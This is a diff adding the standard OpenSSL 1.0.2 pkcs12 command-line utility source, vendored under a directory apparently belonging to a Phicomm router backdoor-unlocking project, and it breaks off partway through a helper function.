+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs12.c
@@ -0,0 +1,1068 @@
+/* pkcs12.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/opensslconf.h>
+#if !defined(OPENSSL_NO_DES) && !defined(OPENSSL_NO_SHA1)
+
+# include <stdio.h>
+# include <stdlib.h>
+# include <string.h>
+# include "apps.h"
+# include <openssl/crypto.h>
+# include <openssl/err.h>
+# include <openssl/pem.h>
+# include <openssl/pkcs12.h>
+
+# define PROG pkcs12_main
+
+const EVP_CIPHER *enc;
+
+# define NOKEYS          0x1
+# define NOCERTS         0x2
+# define INFO            0x4
+# define CLCERTS         0x8
+# define CACERTS         0x10
+
+int get_cert_chain(X509 *cert, X509_STORE *store, STACK_OF(X509) **chain);
+int dump_certs_keys_p12(BIO *out, PKCS12 *p12, char *pass, int passlen,
+                        int options, char *pempass);
+int dump_certs_pkeys_bags(BIO *out, STACK_OF(PKCS12_SAFEBAG) *bags,
+                          char *pass, int passlen, int options,
+                          char *pempass);
+int dump_certs_pkeys_bag(BIO *out, PKCS12_SAFEBAG *bags, char *pass,
+                         int passlen, int options, char *pempass);
+int print_attribs(BIO *out, STACK_OF(X509_ATTRIBUTE) *attrlst,
+                  const char *name);
+void hex_prin(BIO *out, unsigned char *buf, int len);
+int alg_print(BIO *x, X509_ALGOR *alg);
+int cert_load(BIO *in, STACK_OF(X509) *sk);
+static int set_pbe(BIO *err, int *ppbe, const char *str);
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    ENGINE *e = NULL;
+    char *infile = NULL, *outfile = NULL, *keyname = NULL;
+    char *certfile = NULL;
+    BIO *in = NULL, *out = NULL;
+    char **args;
+    char *name = NULL;
+    char *csp_name = NULL;
+    int add_lmk = 0;
+    PKCS12 *p12 = NULL;
+    char pass[50], macpass[50];
+    int export_cert = 0;
+    int options = 0;
+    int chain = 0;
+    int badarg = 0;
+    int iter = PKCS12_DEFAULT_ITER;
+    int maciter = PKCS12_DEFAULT_ITER;
+    int twopass = 0;
+    int keytype = 0;
+    int cert_pbe;
+    int key_pbe = NID_pbe_WithSHA1And3_Key_TripleDES_CBC;
+    int ret = 1;
+    int macver = 1;
+    int noprompt = 0;
+    STACK_OF(OPENSSL_STRING) *canames = NULL;
+    char *cpass = NULL, *mpass = NULL;
+    char *passargin = NULL, *passargout = NULL, *passarg = NULL;
+    char *passin = NULL, *passout = NULL;
+    char *inrand = NULL;
+    char *macalg = NULL;
+    char *CApath = NULL, *CAfile = NULL;
+# ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+# endif
+
+    apps_startup();
+
+# ifdef OPENSSL_FIPS
+    if (FIPS_mode())
+        cert_pbe = NID_pbe_WithSHA1And3_Key_TripleDES_CBC;
+    else
+# endif
+        cert_pbe = NID_pbe_WithSHA1And40BitRC2_CBC;
+
+    enc = EVP_des_ede3_cbc();
+    if (bio_err == NULL)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    args = argv + 1;
+
+    while (*args) {
+        if (*args[0] == '-') {
+            if (!strcmp(*args, "-nokeys"))
+                options |= NOKEYS;
+            else if (!strcmp(*args, "-keyex"))
+                keytype = KEY_EX;
+            else if (!strcmp(*args, "-keysig"))
+                keytype = KEY_SIG;
+            else if (!strcmp(*args, "-nocerts"))
+                options |= NOCERTS;
+            else if (!strcmp(*args, "-clcerts"))
+                options |= CLCERTS;
+            else if (!strcmp(*args, "-cacerts"))
+                options |= CACERTS;
+            else if (!strcmp(*args, "-noout"))
+                options |= (NOKEYS | NOCERTS);
+            else if (!strcmp(*args, "-info"))
+                options |= INFO;
+            else if (!strcmp(*args, "-chain"))
+                chain = 1;
+            else if (!strcmp(*args, "-twopass"))
+                twopass = 1;
+            else if (!strcmp(*args, "-nomacver"))
+                macver = 0;
+            else if (!strcmp(*args, "-descert"))
+                cert_pbe = NID_pbe_WithSHA1And3_Key_TripleDES_CBC;
+            else if (!strcmp(*args, "-export"))
+                export_cert = 1;
+            else if (!strcmp(*args, "-des"))
+                enc = EVP_des_cbc();
+            else if (!strcmp(*args, "-des3"))
+                enc = EVP_des_ede3_cbc();
+# ifndef OPENSSL_NO_IDEA
+            else if (!strcmp(*args, "-idea"))
+                enc = EVP_idea_cbc();
+# endif
+# ifndef OPENSSL_NO_SEED
+            else if (!strcmp(*args, "-seed"))
+                enc = EVP_seed_cbc();
+# endif
+# ifndef OPENSSL_NO_AES
+            else if (!strcmp(*args, "-aes128"))
+                enc = EVP_aes_128_cbc();
+            else if (!strcmp(*args, "-aes192"))
+                enc = EVP_aes_192_cbc();
+            else if (!strcmp(*args, "-aes256"))
+                enc = EVP_aes_256_cbc();
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+            else if (!strcmp(*args, "-camellia128"))
+                enc = EVP_camellia_128_cbc();
+            else if (!strcmp(*args, "-camellia192"))
+                enc = EVP_camellia_192_cbc();
+            else if (!strcmp(*args, "-camellia256"))
+                enc = EVP_camellia_256_cbc();
+# endif
+            else if (!strcmp(*args, "-noiter"))
+                iter = 1;
+            else if (!strcmp(*args, "-maciter"))
+                maciter = PKCS12_DEFAULT_ITER;
+            else if (!strcmp(*args, "-nomaciter"))
+                maciter = 1;
+            else if (!strcmp(*args, "-nomac"))
+                maciter = -1;
+            else if (!strcmp(*args, "-macalg"))
+                if (args[1]) {
+                    args++;
+                    macalg = *args;
+                } else
+                    badarg = 1;
+            else if (!strcmp(*args, "-nodes"))
+                enc = NULL;
+            else if (!strcmp(*args, "-certpbe")) {
+                if (!set_pbe(bio_err, &cert_pbe, *++args))
+                    badarg = 1;
+            } else if (!strcmp(*args, "-keypbe")) {
+                if (!set_pbe(bio_err, &key_pbe, *++args))
+                    badarg = 1;
+            } else if (!strcmp(*args, "-rand")) {
+                if (args[1]) {
+                    args++;
+                    inrand = *args;
+                } else
+                    badarg = 1;
+            } else if (!strcmp(*args, "-inkey")) {
+                if (args[1]) {
+                    args++;
+                    keyname = *args;
+                } else
+                    badarg = 1;
+            } else if (!strcmp(*args, "-certfile")) {
+                if (args[1]) {
+                    args++;
+                    certfile = *args;
+                } else
+                    badarg = 1;
+            } else if (!strcmp(*args, "-name")) {
+                if (args[1]) {
+                    args++;
+                    name = *args;
+                } else
+                    badarg = 1;
+            } else if (!strcmp(*args, "-LMK"))
+                add_lmk = 1;
+            else if (!strcmp(*args, "-CSP")) {
+                if (args[1]) {
+                    args++;
+                    csp_name = *args;
+                } else
+                    badarg = 1;
+            } else if (!strcmp(*args, "-caname")) {
+                if (args[1]) {
+                    args++;
+                    if (!canames)
+                        canames = sk_OPENSSL_STRING_new_null();
+                    sk_OPENSSL_STRING_push(canames, *args);
+                } else
+                    badarg = 1;
+            } else if (!strcmp(*args, "-in")) {
+                if (args[1]) {
+                    args++;
+                    infile = *args;
+                } else
+                    badarg = 1;
+            } else if (!strcmp(*args, "-out")) {
+                if (args[1]) {
+                    args++;
+                    outfile = *args;
+                } else
+                    badarg = 1;
+            } else if (!strcmp(*args, "-passin")) {
+                if (args[1]) {
+                    args++;
+                    passargin = *args;
+                } else
+                    badarg = 1;
+            } else if (!strcmp(*args, "-passout")) {
+                if (args[1]) {
+                    args++;
+                    passargout = *args;
+                } else
+                    badarg = 1;
+            } else if (!strcmp(*args, "-password")) {
+                if (args[1]) {
+                    args++;
+                    passarg = *args;
+                    noprompt = 1;
+                } else
+                    badarg = 1;
+            } else if (!strcmp(*args, "-CApath")) {
+                if (args[1]) {
+                    args++;
+                    CApath = *args;
+                } else
+                    badarg = 1;
+            } else if (!strcmp(*args, "-CAfile")) {
+                if (args[1]) {
+                    args++;
+                    CAfile = *args;
+                } else
+                    badarg = 1;
+# ifndef OPENSSL_NO_ENGINE
+            } else if (!strcmp(*args, "-engine")) {
+                if (args[1]) {
+                    args++;
+                    engine = *args;
+                } else
+                    badarg = 1;
+# endif
+            } else
+                badarg = 1;
+
+        } else
+            badarg = 1;
+        args++;
+    }
+
+    if (badarg) {
+        BIO_printf(bio_err, "Usage: pkcs12 [options]\n");
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, "-export       output PKCS12 file\n");
+        BIO_printf(bio_err, "-chain        add certificate chain\n");
+        BIO_printf(bio_err, "-inkey file   private key if not infile\n");
+        BIO_printf(bio_err, "-certfile f   add all certs in f\n");
+        BIO_printf(bio_err, "-CApath arg   - PEM format directory of CA's\n");
+        BIO_printf(bio_err, "-CAfile arg   - PEM format file of CA's\n");
+        BIO_printf(bio_err, "-name \"name\"  use name as friendly name\n");
+        BIO_printf(bio_err,
+                   "-caname \"nm\"  use nm as CA friendly name (can be used more than once).\n");
+        BIO_printf(bio_err, "-in  infile   input filename\n");
+        BIO_printf(bio_err, "-out outfile  output filename\n");
+        BIO_printf(bio_err,
+                   "-noout        don't output anything, just verify.\n");
+        BIO_printf(bio_err, "-nomacver     don't verify MAC.\n");
+        BIO_printf(bio_err, "-nocerts      don't output certificates.\n");
+        BIO_printf(bio_err,
+                   "-clcerts      only output client certificates.\n");
+        BIO_printf(bio_err, "-cacerts      only output CA certificates.\n");
+        BIO_printf(bio_err, "-nokeys       don't output private keys.\n");
+        BIO_printf(bio_err,
+                   "-info         give info about PKCS#12 structure.\n");
+        BIO_printf(bio_err, "-des          encrypt private keys with DES\n");
+        BIO_printf(bio_err,
+                   "-des3         encrypt private keys with triple DES (default)\n");
+# ifndef OPENSSL_NO_IDEA
+        BIO_printf(bio_err, "-idea         encrypt private keys with idea\n");
+# endif
+# ifndef OPENSSL_NO_SEED
+        BIO_printf(bio_err, "-seed         encrypt private keys with seed\n");
+# endif
+# ifndef OPENSSL_NO_AES
+        BIO_printf(bio_err, "-aes128, -aes192, -aes256\n");
+        BIO_printf(bio_err,
+                   "              encrypt PEM output with cbc aes\n");
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+        BIO_printf(bio_err, "-camellia128, -camellia192, -camellia256\n");
+        BIO_printf(bio_err,
+                   "              encrypt PEM output with cbc camellia\n");
+# endif
+        BIO_printf(bio_err, "-nodes        don't encrypt private keys\n");
+        BIO_printf(bio_err, "-noiter       don't use encryption iteration\n");
+        BIO_printf(bio_err, "-nomaciter    don't use MAC iteration\n");
+        BIO_printf(bio_err, "-maciter      use MAC iteration\n");
+        BIO_printf(bio_err, "-nomac        don't generate MAC\n");
+        BIO_printf(bio_err,
+                   "-twopass      separate MAC, encryption passwords\n");
+        BIO_printf(bio_err,
+                   "-descert      encrypt PKCS#12 certificates with triple DES (default RC2-40)\n");
+        BIO_printf(bio_err,
+                   "-certpbe alg  specify certificate PBE algorithm (default RC2-40)\n");
+        BIO_printf(bio_err,
+                   "-keypbe alg   specify private key PBE algorithm (default 3DES)\n");
+        BIO_printf(bio_err,
+                   "-macalg alg   digest algorithm used in MAC (default SHA1)\n");
+        BIO_printf(bio_err, "-keyex        set MS key exchange type\n");
+        BIO_printf(bio_err, "-keysig       set MS key signature type\n");
+        BIO_printf(bio_err,
+                   "-password p   set import/export password source\n");
+        BIO_printf(bio_err, "-passin p     input file pass phrase source\n");
+        BIO_printf(bio_err, "-passout p    output file pass phrase source\n");
+# ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   "-engine e     use engine e, possibly a hardware device.\n");
+# endif
+        BIO_printf(bio_err, "-rand file%cfile%c...\n", LIST_SEPARATOR_CHAR,
+                   LIST_SEPARATOR_CHAR);
+        BIO_printf(bio_err,
+                   "              load the file (or the files in the directory) into\n");
+        BIO_printf(bio_err, "              the random number generator\n");
+        BIO_printf(bio_err, "-CSP name     Microsoft CSP name\n");
+        BIO_printf(bio_err,
+                   "-LMK          Add local machine keyset attribute to private key\n");
+        goto end;
+    }
+# ifndef OPENSSL_NO_ENGINE
+    e = setup_engine(bio_err, engine, 0);
+# endif
+
+    if (passarg) {
+        if (export_cert)
+            passargout = passarg;
+        else
+            passargin = passarg;
+    }
+
+    if (!app_passwd(bio_err, passargin, passargout, &passin, &passout)) {
+        BIO_printf(bio_err, "Error getting passwords\n");
+        goto end;
+    }
+
+    if (!cpass) {
+        if (export_cert)
+            cpass = passout;
+        else
+            cpass = passin;
+    }
+
+    if (cpass) {
+        mpass = cpass;
+        noprompt = 1;
+    } else {
+        cpass = pass;
+        mpass = macpass;
+    }
+
+    if (export_cert || inrand) {
+        app_RAND_load_file(NULL, bio_err, (inrand != NULL));
+        if (inrand != NULL)
+            BIO_printf(bio_err, "%ld semi-random bytes loaded\n",
+                       app_RAND_load_files(inrand));
+    }
+    ERR_load_crypto_strings();
+
+# ifdef CRYPTO_MDEBUG
+    CRYPTO_push_info("read files");
+# endif
+
+    if (!infile)
+        in = BIO_new_fp(stdin, BIO_NOCLOSE);
+    else
+        in = BIO_new_file(infile, "rb");
+    if (!in) {
+        BIO_printf(bio_err, "Error opening input file %s\n",
+                   infile ? infile : "<stdin>");
+        perror(infile);
+        goto end;
+    }
+# ifdef CRYPTO_MDEBUG
+    CRYPTO_pop_info();
+    CRYPTO_push_info("write files");
+# endif
+
+    if (!outfile) {
+        out = BIO_new_fp(stdout, BIO_NOCLOSE);
+# ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+# endif
+    } else
+        out = BIO_new_file(outfile, "wb");
+    if (!out) {
+        BIO_printf(bio_err, "Error opening output file %s\n",
+                   outfile ? outfile : "<stdout>");
+        perror(outfile);
+        goto end;
+    }
+    if (twopass) {
+# ifdef CRYPTO_MDEBUG
+        CRYPTO_push_info("read MAC password");
+# endif
+        if (EVP_read_pw_string
+            (macpass, sizeof macpass, "Enter MAC Password:", export_cert)) {
+            BIO_printf(bio_err, "Can't read Password\n");
+            goto end;
+        }
+# ifdef CRYPTO_MDEBUG
+        CRYPTO_pop_info();
+# endif
+    }
+
+    if (export_cert) {
+        EVP_PKEY *key = NULL;
+        X509 *ucert = NULL, *x = NULL;
+        STACK_OF(X509) *certs = NULL;
+        const EVP_MD *macmd = NULL;
+        unsigned char *catmp = NULL;
+        int i;
+
+        if ((options & (NOCERTS | NOKEYS)) == (NOCERTS | NOKEYS)) {
+            BIO_printf(bio_err, "Nothing to do!\n");
+            goto export_end;
+        }
+
+        if (options & NOCERTS)
+            chain = 0;
+
+# ifdef CRYPTO_MDEBUG
+        CRYPTO_push_info("process -export_cert");
+        CRYPTO_push_info("reading private key");
+# endif
+        if (!(options & NOKEYS)) {
+            key = load_key(bio_err, keyname ? keyname : infile,
+                           FORMAT_PEM, 1, passin, e, "private key");
+            if (!key)
+                goto export_end;
+        }
+# ifdef CRYPTO_MDEBUG
+        CRYPTO_pop_info();
+        CRYPTO_push_info("reading certs from input");
+# endif
+
+        /* Load in all certs in input file */
+        if (!(options & NOCERTS)) {
+            certs = load_certs(bio_err, infile, FORMAT_PEM, NULL, e,
+                               "certificates");
+            if (!certs)
+                goto export_end;
+
+            if (key) {
+                /* Look for matching private key */
+                for (i = 0; i < sk_X509_num(certs); i++) {
+                    x = sk_X509_value(certs, i);
+                    if (X509_check_private_key(x, key)) {
+                        ucert = x;
+                        /* Zero keyid and alias */
+                        X509_keyid_set1(ucert, NULL, 0);
+                        X509_alias_set1(ucert, NULL, 0);
+                        /* Remove from list */
+                        (void)sk_X509_delete(certs, i);
+                        break;
+                    }
+                }
+                if (!ucert) {
+                    BIO_printf(bio_err,
+                               "No certificate matches private key\n");
+                    goto export_end;
+                }
+            }
+
+        }
+# ifdef CRYPTO_MDEBUG
+        CRYPTO_pop_info();
+        CRYPTO_push_info("reading certs from input 2");
+# endif
+
+        /* Add any more certificates asked for */
+        if (certfile) {
+            STACK_OF(X509) *morecerts = NULL;
+            if (!(morecerts = load_certs(bio_err, certfile, FORMAT_PEM,
+                                         NULL, e,
+                                         "certificates from certfile")))
+                goto export_end;
+            while (sk_X509_num(morecerts) > 0)
+                sk_X509_push(certs, sk_X509_shift(morecerts));
+            sk_X509_free(morecerts);
+        }
+# ifdef CRYPTO_MDEBUG
+        CRYPTO_pop_info();
+        CRYPTO_push_info("reading certs from certfile");
+# endif
+
+# ifdef CRYPTO_MDEBUG
+        CRYPTO_pop_info();
+        CRYPTO_push_info("building chain");
+# endif
+
+        /* If chaining get chain from user cert */
+        if (chain) {
+            int vret;
+            STACK_OF(X509) *chain2;
+            X509_STORE *store = X509_STORE_new();
+            if (!store) {
+                BIO_printf(bio_err, "Memory allocation error\n");
+                goto export_end;
+            }
+            if (!X509_STORE_load_locations(store, CAfile, CApath))
+                X509_STORE_set_default_paths(store);
+
+            vret = get_cert_chain(ucert, store, &chain2);
+            X509_STORE_free(store);
+
+            if (!vret) {
+                /* Exclude verified certificate */
+                for (i = 1; i < sk_X509_num(chain2); i++)
+                    sk_X509_push(certs, sk_X509_value(chain2, i));
+                /* Free first certificate */
+                X509_free(sk_X509_value(chain2, 0));
+                sk_X509_free(chain2);
+            } else {
+                if (vret >= 0)
+                    BIO_printf(bio_err, "Error %s getting chain.\n",
+                               X509_verify_cert_error_string(vret));
+                else
+                    ERR_print_errors(bio_err);
+                goto export_end;
+            }
+        }
+
+        /* Add any CA names */
+
+        for (i = 0; i < sk_OPENSSL_STRING_num(canames); i++) {
+            catmp = (unsigned char *)sk_OPENSSL_STRING_value(canames, i);
+            X509_alias_set1(sk_X509_value(certs, i), catmp, -1);
+        }
+
+        if (csp_name && key)
+            EVP_PKEY_add1_attr_by_NID(key, NID_ms_csp_name,
+                                      MBSTRING_ASC, (unsigned char *)csp_name,
+                                      -1);
+
+        if (add_lmk && key)
+            EVP_PKEY_add1_attr_by_NID(key, NID_LocalKeySet, 0, NULL, -1);
+
+# ifdef CRYPTO_MDEBUG
+        CRYPTO_pop_info();
+        CRYPTO_push_info("reading password");
+# endif
+
+        if (!noprompt &&
+            EVP_read_pw_string(pass, sizeof pass, "Enter Export Password:",
+                               1)) {
+            BIO_printf(bio_err, "Can't read Password\n");
+            goto export_end;
+        }
+        if (!twopass)
+            BUF_strlcpy(macpass, pass, sizeof macpass);
+
+# ifdef CRYPTO_MDEBUG
+        CRYPTO_pop_info();
+        CRYPTO_push_info("creating PKCS#12 structure");
+# endif
+
+        p12 = PKCS12_create(cpass, name, key, ucert, certs,
+                            key_pbe, cert_pbe, iter, -1, keytype);
+
+        if (!p12) {
+            ERR_print_errors(bio_err);
+            goto export_end;
+        }
+
+        if (macalg) {
+            macmd = EVP_get_digestbyname(macalg);
+            if (!macmd) {
+                BIO_printf(bio_err, "Unknown digest algorithm %s\n", macalg);
+            }
+        }
+
+        if (maciter != -1)
+            PKCS12_set_mac(p12, mpass, -1, NULL, 0, maciter, macmd);
+
+# ifdef CRYPTO_MDEBUG
+        CRYPTO_pop_info();
+        CRYPTO_push_info("writing pkcs12");
+# endif
+
+        i2d_PKCS12_bio(out, p12);
+
+        ret = 0;
+
+ export_end:
+# ifdef CRYPTO_MDEBUG
+        CRYPTO_pop_info();
+        CRYPTO_pop_info();
+        CRYPTO_push_info("process -export_cert: freeing");
+# endif
+
+        if (key)
+            EVP_PKEY_free(key);
+        if (certs)
+            sk_X509_pop_free(certs, X509_free);
+        if (ucert)
+            X509_free(ucert);
+
+# ifdef CRYPTO_MDEBUG
+        CRYPTO_pop_info();
+# endif
+        goto end;
+
+    }
+
+    if (!(p12 = d2i_PKCS12_bio(in, NULL))) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+# ifdef CRYPTO_MDEBUG
+    CRYPTO_push_info("read import password");
+# endif
+    if (!noprompt
+        && EVP_read_pw_string(pass, sizeof pass, "Enter Import Password:",
+                              0)) {
+        BIO_printf(bio_err, "Can't read Password\n");
+        goto end;
+    }
+# ifdef CRYPTO_MDEBUG
+    CRYPTO_pop_info();
+# endif
+
+    if (!twopass)
+        BUF_strlcpy(macpass, pass, sizeof macpass);
+
+    if ((options & INFO) && p12->mac)
+        BIO_printf(bio_err, "MAC Iteration %ld\n",
+                   p12->mac->iter ? ASN1_INTEGER_get(p12->mac->iter) : 1);
+    if (macver) {
+# ifdef CRYPTO_MDEBUG
+        CRYPTO_push_info("verify MAC");
+# endif
+        /* If we enter empty password try no password first */
+        if (!mpass[0] && PKCS12_verify_mac(p12, NULL, 0)) {
+            /* If mac and crypto pass the same set it to NULL too */
+            if (!twopass)
+                cpass = NULL;
+        } else if (!PKCS12_verify_mac(p12, mpass, -1)) {
+            BIO_printf(bio_err, "Mac verify error: invalid password?\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        BIO_printf(bio_err, "MAC verified OK\n");
+# ifdef CRYPTO_MDEBUG
+        CRYPTO_pop_info();
+# endif
+    }
+# ifdef CRYPTO_MDEBUG
+    CRYPTO_push_info("output keys and certificates");
+# endif
+    if (!dump_certs_keys_p12(out, p12, cpass, -1, options, passout)) {
+        BIO_printf(bio_err, "Error outputting keys and certificates\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+# ifdef CRYPTO_MDEBUG
+    CRYPTO_pop_info();
+# endif
+    ret = 0;
+ end:
+    if (p12)
+        PKCS12_free(p12);
+    if (export_cert || inrand)
+        app_RAND_write_file(NULL, bio_err);
+# ifdef CRYPTO_MDEBUG
+    CRYPTO_remove_all_info();
+# endif
+    BIO_free(in);
+    BIO_free_all(out);
+    if (canames)
+        sk_OPENSSL_STRING_free(canames);
+    if (passin)
+        OPENSSL_free(passin);
+    if (passout)
+        OPENSSL_free(passout);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
+int dump_certs_keys_p12(BIO *out, PKCS12 *p12, char *pass,
+                        int passlen, int options, char *pempass)
+{
+    STACK_OF(PKCS7) *asafes = NULL;
+    STACK_OF(PKCS12_SAFEBAG) *bags;
+    int i, bagnid;
+    int ret = 0;
+    PKCS7 *p7;
+
+    if (!(asafes = PKCS12_unpack_authsafes(p12)))
+        return 0;
+    for (i = 0; i < sk_PKCS7_num(asafes); i++) {
+        p7 = sk_PKCS7_value(asafes, i);
+        bagnid = OBJ_obj2nid(p7->type);
+        if (bagnid == NID_pkcs7_data) {
+            bags = PKCS12_unpack_p7data(p7);
+            if (options & INFO)
+                BIO_printf(bio_err, "PKCS7 Data\n");
+        } else if (bagnid == NID_pkcs7_encrypted) {
+            if (options & INFO) {
+                BIO_printf(bio_err, "PKCS7 Encrypted data: ");
+                alg_print(bio_err, p7->d.encrypted->enc_data->algorithm);
+            }
+            bags = PKCS12_unpack_p7encdata(p7, pass, passlen);
+        } else
+            continue;
+        if (!bags)
+            goto err;
+        if (!dump_certs_pkeys_bags(out, bags, pass, passlen,
+                                   options, pempass)) {
+            sk_PKCS12_SAFEBAG_pop_free(bags, PKCS12_SAFEBAG_free);
+            goto err;
+        }
+        sk_PKCS12_SAFEBAG_pop_free(bags, PKCS12_SAFEBAG_free);
+        bags = NULL;
+    }
+    ret = 1;
+
+ err:
+
+    if (asafes)
+        sk_PKCS7_pop_free(asafes, PKCS7_free);
+    return ret;
+}
+
+int dump_certs_pkeys_bags(BIO *out, STACK_OF(PKCS12_SAFEBAG) *bags,
+                          char *pass, int passlen, int options, char *pempass)
+{
+    int i;
+    for (i = 0; i < sk_PKCS12_SAFEBAG_num(bags); i++) {
+        if (!dump_certs_pkeys_bag(out,
+                                  sk_PKCS12_SAFEBAG_value(bags, i),
+                                  pass, passlen, options, pempass))
+            return 0;
+    }
+    return 1;
+}
+
+int dump_certs_pkeys_bag(BIO *out, PKCS12_SAFEBAG *bag, char *pass,
+                         int passlen, int options, char *pempass)
+{
+    EVP_PKEY *pkey;
+    PKCS8_PRIV_KEY_INFO *p8;
+    X509 *x509;
+
+    switch (M_PKCS12_bag_type(bag)) {
+    case NID_keyBag:
+        if (options & INFO)
+            BIO_printf(bio_err, "Key bag\n");
+        if (options & NOKEYS)
+            return 1;
+        print_attribs(out, bag->attrib, "Bag Attributes");
+        p8 = bag->value.keybag;
+        if (!(pkey = EVP_PKCS82PKEY(p8)))
+            return 0;
+        print_attribs(out, p8->attributes, "Key Attributes");
+        PEM_write_bio_PrivateKey(out, pkey, enc, NULL, 0, NULL, pempass);
+        EVP_PKEY_free(pkey);
+        break;
+
+    case NID_pkcs8ShroudedKeyBag:
+        if (options & INFO) {
+            BIO_printf(bio_err, "Shrouded Keybag: ");
+            alg_print(bio_err, bag->value.shkeybag->algor);
+        }
+        if (options & NOKEYS)
+            return 1;
+        print_attribs(out, bag->attrib, "Bag Attributes");
+        if (!(p8 = PKCS12_decrypt_skey(bag, pass, passlen)))
+            return 0;
+        if (!(pkey = EVP_PKCS82PKEY(p8))) {
+            PKCS8_PRIV_KEY_INFO_free(p8);
+            return 0;
+        }
+        print_attribs(out, p8->attributes, "Key Attributes");
+        PKCS8_PRIV_KEY_INFO_free(p8);
+        PEM_write_bio_PrivateKey(out, pkey, enc, NULL, 0, NULL, pempass);
+        EVP_PKEY_free(pkey);
+        break;
+
+    case NID_certBag:
+        if (options & INFO)
+            BIO_printf(bio_err, "Certificate bag\n");
+        if (options & NOCERTS)
+            return 1;
+        if (PKCS12_get_attr(bag, NID_localKeyID)) {
+            if (options & CACERTS)
+                return 1;
+        } else if (options & CLCERTS)
+            return 1;
+        print_attribs(out, bag->attrib, "Bag Attributes");
+        if (M_PKCS12_cert_bag_type(bag) != NID_x509Certificate)
+            return 1;
+        if (!(x509 = PKCS12_certbag2x509(bag)))
+            return 0;
+        dump_cert_text(out, x509);
+        PEM_write_bio_X509(out, x509);
+        X509_free(x509);
+        break;
+
+    case NID_safeContentsBag:
+        if (options & INFO)
+            BIO_printf(bio_err, "Safe Contents bag\n");
+        print_attribs(out, bag->attrib, "Bag Attributes");
+        return dump_certs_pkeys_bags(out, bag->value.safes, pass,
+                                     passlen, options, pempass);
+
+    default:
+        BIO_printf(bio_err, "Warning unsupported bag type: ");
+        i2a_ASN1_OBJECT(bio_err, bag->type);
+        BIO_printf(bio_err, "\n");
+        return 1;
+        break;
+    }
+    return 1;
+}
+
+/* Given a single certificate return a verified chain or NULL if error */
+
+/* Hope this is OK .... */
+
+int get_cert_chain(X509 *cert, X509_STORE *store, STACK_OF(X509) **chain)
+{
+    X509_STORE_CTX store_ctx;
+    STACK_OF(X509) *chn;
+    int i = 0;
+
+    /*
+     * FIXME: Should really check the return status of X509_STORE_CTX_init
+     * for an error, but how that fits into the return value of this function
+     * is less obvious.
+     */
+    X509_STORE_CTX_init(&store_ctx, store, cert, NULL);
+    if (X509_verify_cert(&store_ctx) <= 0) {
+        i = X509_STORE_CTX_get_error(&store_ctx);
+        if (i == 0)
+            /*
+             * avoid returning 0 if X509_verify_cert() did not set an
+             * appropriate error value in the context
+             */
+            i = -1;
+        chn = NULL;
+        goto err;
+    } else
+        chn = X509_STORE_CTX_get1_chain(&store_ctx);
+ err:
+    X509_STORE_CTX_cleanup(&store_ctx);
+    *chain = chn;
+
+    return i;
+}
+
+int alg_print(BIO *x, X509_ALGOR *alg)
+{
+    PBEPARAM *pbe;
+    const unsigned char *p;
+    p = alg->parameter->value.sequence->data;
+    pbe = d2i_PBEPARAM(NULL, &p, alg->parameter->value.sequence->length);
+    if (!pbe)
+        return 1;
